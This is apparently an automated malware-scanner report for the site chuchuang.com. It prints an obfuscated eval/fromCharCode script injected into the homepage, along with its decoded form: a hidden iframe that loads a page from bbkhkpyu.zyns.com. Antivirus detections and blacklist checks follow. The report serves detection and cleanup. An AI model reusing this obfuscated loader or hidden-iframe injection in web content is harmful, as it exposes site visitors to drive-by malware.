New scan:

Malware Scanner report for chuchuang.com

Malicious/Suspicious/Total urls checked
1/0/6
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://chuchuang.com/
200 OK
Content-Length: 3751
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

if(window.document)a=("urf3".split+'qwe').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,4,86,-28,-28,-28,68,65,77,60,72,64,77,3,4,22,-28,-28,88,-5,64,71,78,64,-5,86,-28,-28,-28,63,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-3,23,68,65,77,60,72,64,-5,78,77,62,24,2,67,79,79,75,21,10,10,61,61,70,67,70,75,84,80,9,85,84,73,78,9,62,74,72,10,68,10,68,9,75,67,75,26,66,74
... 879 bytes are skipped ...
9,84,71,64,9,79,74,75,24,2,11,2,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,82,68,63,79,67,2,7,2,12,11,2,4,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,67,64,68,66,67,79,2,7,2,12,11,2,4,22,-28,-28,-28,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,9,60,75,75,64,73,63,30,67,68,71,63,3,65,4,22,-28,-28,88];md='a';q="q";e=eval;w=f;s='';g='fro'+'mCharCode';for(i=0;i<w.length;i++){s=s+String[g](37+w[i]);}if(a===aa)e('e(s)');

Decoded script:


e(s)
e(s)
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://bbkhkpyu.zyns.com/i/i.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttrib
... 366 bytes are skipped ...
function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://bbkhkpyu.zyns.com/i/i.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://chuchuang.com/swfobject.js
200 OK
Content-Length: 6880
Content-Type: application/x-javascript
clean
http://law.sudusite.net/leshan110/jquery.js
200 OK
Content-Length: 91556
Content-Type: application/x-javascript
clean
http://law.sudusite.net/leshan110/leshan110.js
200 OK
Content-Length: 667
Content-Type: application/x-javascript
clean
http://chuchuang.com/swfobject.html?detectflash=false
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean
http://chuchuang.com/test404page.js
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: chuchuang.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 22:33:10 GMT
Accept-Ranges: bytes
ETag: "801bfd9f47b6cc1:15c774"
Server: Microsoft-IIS/6.0
Content-Length: 3751
Content-Location: http://chuchuang.com/index.html
Content-Type: text/html
Last-Modified: Fri, 09 Dec 2011 07:53:23 GMT
X-Powered-By: ASP.NET

...3751 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chuchuang.com
Referer: http://www.google.com/search?q=chuchuang.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=chuchuang.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chuchuang.com/

Result: chuchuang.com is not infected or malware details are not published yet.